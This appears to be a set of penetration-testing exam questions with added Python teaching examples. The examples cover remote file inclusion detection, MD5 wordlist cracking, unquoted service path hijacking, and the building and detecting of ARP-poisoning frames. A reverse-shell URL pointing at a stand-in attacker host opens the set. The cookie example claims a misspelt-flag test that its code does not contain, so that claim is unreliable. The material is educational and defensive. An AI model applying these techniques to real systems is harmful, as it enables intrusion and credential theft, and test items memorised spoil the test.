While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
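The URL above is the classic remote file inclusion pattern: a parameter whose value is a URL to an attacker-controlled script, handed to a server-side include. As an added example (not part of the exam text), the Python below does two things a practitioner would want: it scans constructed WAF/access-log URLs for parameter values that are remote-include indicators, and it shows the remediation side, an allowlist validator for the Phone parameter that can never accept a URL. Host names and sample lines are constructed.

```python
"""Added example: detect RFI indicators in logged URLs and validate the
parameter with an allowlist. Sample URLs are constructed for this example."""
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes and PHP stream wrappers an include() will happily fetch code from.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://",
                  "data:", "php://", "expect://")


def rfi_indicators(url):
    """Return (parameter, value) pairs whose value looks like a remote include."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


# Allowlist for a phone number: optional '+', then 7 to 15 digits, nothing else.
PHONE_RE = re.compile(r"\+?[0-9]{7,15}")


def validate_phone(value):
    """The remediation: accept only what a phone number can be, reject all else."""
    return PHONE_RE.fullmatch(value) is not None


# Constructed sample of URLs as they would appear in a WAF or access log.
SAMPLE_URLS = [
    "https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php",
    "https://example.com/index.php?Phone=%2B15551234567",
    "https://example.com/index.php?page=php://filter/convert.base64-encode/resource=index",
]


def scan(urls):
    """Map each URL to the RFI indicators found in its query string."""
    return {u: rfi_indicators(u) for u in urls}


if __name__ == "__main__":
    for url, hits in scan(SAMPLE_URLS).items():
        print("RFI?" if hits else "ok  ", url, hits)
```

Input validation is the detection and the first line of defence, but the durable fix is to stop passing user input to include-style functions at all; in PHP, `allow_url_include=Off` (its default) additionally blocks the remote-URL form, though not local wrappers such as `php://filter`.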
Which of the following tools is used to perform a credential brute force attack?
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take?
A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?
A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?
Performance based
You are a penetration tester reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.
A penetration testing company was hired to conduct a penetration test against Company A's network of 20.10.10.0/24 and mail.companyA.com. While the penetration testing company was in the information gathering phase, it was discovered that the mail.companyA.com IP address resolved to 20.15.1.2 and belonged to Company B. Which of the following would be the BEST solution to conduct penetration testing against mail.companyA.com?
An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
After establishing a shell on a target system, Joe, a penetration tester, is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?
Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?
Defining exactly what is to be tested and the results to be generated from the test will help prevent?
A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the following classifications BEST describes the individual?
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the code and output below:
import requests
from bs4 import BeautifulSoup

# Request the /admin path directly, not the login page that was provided
response = requests.get("https://www.bank.com/admin")
if response.status_code == 200:
    # Parse the body and collect hidden <div> elements
    soup = BeautifulSoup(response.text, "html.parser")
    hidden = soup.find_all("div", {"type": "hidden"})
    print(response.status_code, response.reason)
else:
    print(response.status_code, response.reason)
Output: 200 OK
Which of the following is the tester intending to do?
Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
Which of the following BEST protects against a rainbow table attack?
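Two of the questions above (the MD5 wordlist question and the rainbow table question) share one mechanism: an unsalted hash can be attacked with a table computed once, for everyone, while a per-user salt forces the attacker to redo the wordlist for each user. The Python below is an added example, not part of the exam text; the "compromised database", users, passwords and wordlist are all constructed here.

```python
"""Added example: cracking unsalted MD5 with a wordlist, and why a per-user
salt defeats a precomputed (rainbow) table. All data is constructed."""
import hashlib
import os


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


# Constructed "compromised database": unsalted MD5 of each user's password.
LEAKED_UNSALTED = {
    "alice": md5_hex(b"Summer2019!"),
    "bob": md5_hex(b"letmein"),
    "carol": md5_hex(b"Tr0ub4dor&3"),   # deliberately absent from the wordlist
}

# Constructed wordlist; a real one is a leaked-password list ordered by frequency.
WORDLIST = ["password", "123456", "letmein", "Summer2019!", "qwerty"]


def crack_unsalted(hashes, wordlist):
    """One hash per word builds a lookup table that cracks every user at once.
    A rainbow table is this table computed ahead of time, for any database."""
    table = {md5_hex(w.encode()): w for w in wordlist}
    ops = len(wordlist)
    found = {user: table[h] for user, h in hashes.items() if h in table}
    return found, ops


def make_salted(password, salt=None):
    """Store (salt, MD5(salt || password)); the salt is unique per user."""
    salt = salt or os.urandom(16)
    return salt.hex(), md5_hex(salt + password)


def crack_salted(records, wordlist):
    """With salts there is no shared table: every user costs a fresh pass."""
    found, ops = {}, 0
    for user, (salt_hex, h) in records.items():
        salt = bytes.fromhex(salt_hex)
        for w in wordlist:
            ops += 1
            if md5_hex(salt + w.encode()) == h:
                found[user] = w
                break
    return found, ops


if __name__ == "__main__":
    print(crack_unsalted(LEAKED_UNSALTED, WORDLIST))
    salted = {"alice": make_salted(b"Summer2019!"), "bob": make_salted(b"letmein")}
    print(crack_salted(salted, WORDLIST))
```

Salting removes the precomputation advantage but not the wordlist attack itself; MD5 is fast enough that per-user cracking is still cheap, which is why a deliberately slow, salted password hash (bcrypt, scrypt, Argon2 or PBKDF2) is the actual remediation.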
During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?
A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
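An unquoted service path containing spaces is ambiguous to the Windows process loader: before it runs `C:\Vendor Tools\Agent Service\agent.exe` it will try `C:\Vendor.exe` and then `C:\Vendor Tools\Agent.exe`, so whoever can write to one of those directories gets code executed as the service account. The Python below is an added example, not part of the exam text: it computes those candidate paths from a service's image path and, against a constructed set of writable directories, reports which ones a tester could plant a binary in. Service names, paths and the writable-directory set are constructed.

```python
"""Added example: enumerate hijack candidates from an unquoted Windows
service path. Paths and writable directories are constructed."""
import ntpath


def hijack_candidates(image_path):
    """Return the executables Windows would try before the real one.

    Quoted paths are safe. For an unquoted path the loader splits at each
    space and tries the prefix with '.exe' appended, left to right."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Drop service arguments: the binary ends at the first '.exe'.
    end = path.lower().find(".exe")
    exe = path[:end + 4] if end != -1 else path
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def exploitable(candidates, writable_dirs):
    """Candidates whose directory the current user can write to."""
    return [c for c in candidates if ntpath.dirname(c) in writable_dirs]


# Constructed service table, as enumerated with
# `wmic service get name,displayname,pathname,startmode` on the target.
SERVICES = {
    "VendorAgent": r"C:\Vendor Tools\Agent Service\agent.exe -config agent.ini",
    "GoodSvc": r'"C:\Program Files\Vendor\svc.exe" -k',
    "Netsvcs": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

# Constructed: directories the low-privilege user was found to have write access to.
WRITABLE = {r"C:\Vendor Tools"}


def report(services=SERVICES, writable=WRITABLE):
    """Map each service to the candidate paths a tester could actually use."""
    out = {}
    for name, path in services.items():
        usable = exploitable(hijack_candidates(path), writable)
        if usable:
            out[name] = usable
    return out


if __name__ == "__main__":
    print(report())
```

The `exploitable()` step matters on the report: a candidate in `C:\` is not writable by a standard user on a default install, so the finding is only a privilege escalation when a writable directory appears in the chain and the service runs as a higher-privileged account.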
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
When performing active information reconnaissance, which of the following should be tested FIRST before starting the exploitation process?
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
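On a single /24 with the gateway at 192.168.1.254, the usual way to get on path to 192.168.1.20 is ARP cache poisoning: the attacker answers for the gateway's IP with its own MAC to the victim, and for the victim's IP to the gateway, so both sides forward through the attacker. The Python below is an added example, not part of the exam text, and assumes ARP poisoning is the vector; it builds the two spoofed frames from raw bytes and then runs the detection a defender would apply to the same traffic (an IP that suddenly maps to a second MAC). The MAC addresses are constructed; the IPs are the ones in the question.

```python
"""Added example: ARP 'is-at' frames used for LAN MITM, and the detection
for them. MACs are constructed; the IPs come from the question above."""
import struct

VICTIM_IP, GATEWAY_IP = "192.168.1.20", "192.168.1.254"
VICTIM_MAC = "66:77:88:99:aa:bb"       # constructed
GATEWAY_MAC = "00:11:22:33:44:55"      # constructed
ATTACKER_MAC = "aa:bb:cc:dd:ee:01"     # constructed


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP reply (42 bytes): 'sender_ip is at sender_mac'.
    Unsolicited replies are accepted by most stacks, which is the whole attack."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)   # Ethernet, IPv4, opcode 2
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_pair():
    """The two frames a poisoner keeps resending: one to each side."""
    to_victim = arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    to_gateway = arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    return to_victim, to_gateway


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) or None for a non-ARP frame."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    smac = ":".join(f"{b:02x}" for b in frame[22:28])
    sip = ".".join(str(b) for b in frame[28:32])
    return opcode, smac, sip


def detect_poisoning(frames, trusted):
    """Flag replies whose sender IP is already bound to a different MAC.
    Returns (ip, trusted_mac, new_mac) per conflicting reply."""
    table = dict(trusted)
    alerts = []
    for f in frames:
        parsed = parse_arp(f)
        if not parsed or parsed[0] != 2:
            continue
        _, smac, sip = parsed
        if sip in table and table[sip] != smac:
            alerts.append((sip, table[sip], smac))
        table.setdefault(sip, smac)
    return alerts


if __name__ == "__main__":
    legit = arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print(detect_poisoning([legit, *poison_pair()], {GATEWAY_IP: GATEWAY_MAC}))
```

The detection is what Dynamic ARP Inspection on a switch, or a static ARP entry for the gateway on the host, does for you; note that the same question's DHCP and DNS addresses are the other on-path levers (a rogue DHCP server handing out a malicious gateway or resolver), and the same "trusted binding changed" check applies to them.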
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?
A penetration tester is performing a code review against a web application. Given the following URL and source code:
Which of the following vulnerabilities is present in the code above?
Which of the following documents BEST describes the manner in which a security assessment will be conducted?
Which of the following are MOST important when planning for an engagement? (Select TWO).
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
Which of the following has occurred in this situation?
If a security consultant comes across a password hash that resembles the following:
b117 525b3454 7Oc29ca3dBaeOb556ba8
Which of the following formats is the correct hash type?
Given the following HTTP response:
HTTP/1.0 200 OK
Server: Apache
Set-Cookie: AUTHID=879DHUT74D9A7C; HttpOnly
Content-type: text/html
Connection: Close
Which of the following aspects of an XSS attack would be prevented?
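The `HttpOnly` attribute keeps the cookie out of `document.cookie`, so script injected by an XSS payload cannot read and exfiltrate the session token; it does nothing against the payload itself or against requests the script makes with the browser's cookie jar. The Python below is an added example, not part of the exam text: it parses the response head quoted above and audits each `Set-Cookie` header for the attributes that limit what XSS (and CSRF) can do with the cookie. One extra header is constructed to show a practitioner's caveat: browsers ignore attribute names they do not recognise, so a misspelt flag gives no protection at all.

```python
"""Added example: audit Set-Cookie headers for HttpOnly, Secure and SameSite.
The response head is the one from the question; extra inputs are constructed."""

RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: AUTHID=879DHUT74D9A7C; HttpOnly\r\n"
    "Content-type: text/html\r\n"
    "Connection: Close\r\n"
    "\r\n"
)


def parse_set_cookie(header_value):
    """Split 'NAME=value; Flag; Key=Value' into (name, flags, valued_attrs).
    Attribute names are compared case-insensitively, as browsers do."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    flags, valued = set(), {}
    for p in parts[1:]:
        if "=" in p:
            k, v = p.split("=", 1)
            valued[k.strip().lower()] = v.strip()
        elif p:
            flags.add(p.lower())
    return name, flags, valued


def audit_cookie(header_value):
    """Return the cookie name and a list of findings, one per missing control."""
    name, flags, valued = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in flags:
        findings.append("missing HttpOnly: document.cookie exposes it, "
                        "so an XSS payload can steal the session")
    if "secure" not in flags:
        findings.append("missing Secure: sent over plain HTTP, capturable on path")
    if valued.get("samesite", "").lower() not in ("strict", "lax"):
        findings.append("missing SameSite=Strict/Lax: cross-site requests carry it (CSRF)")
    return name, findings


def audit_response(raw):
    """Audit every Set-Cookie header in a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    results = {}
    for line in head.split("\r\n")[1:]:
        if line.lower().startswith("set-cookie:"):
            name, findings = audit_cookie(line.split(":", 1)[1].strip())
            results[name] = findings
    return results


if __name__ == "__main__":
    for name, findings in audit_response(RESPONSE).items():
        print(name, findings or ["no findings"])
```

Against the response in the question the audit reports AUTHID as protected from script access but still missing `Secure` and `SameSite`; the misspelt `http-only` variant is reported as unprotected, which is exactly how a browser treats it.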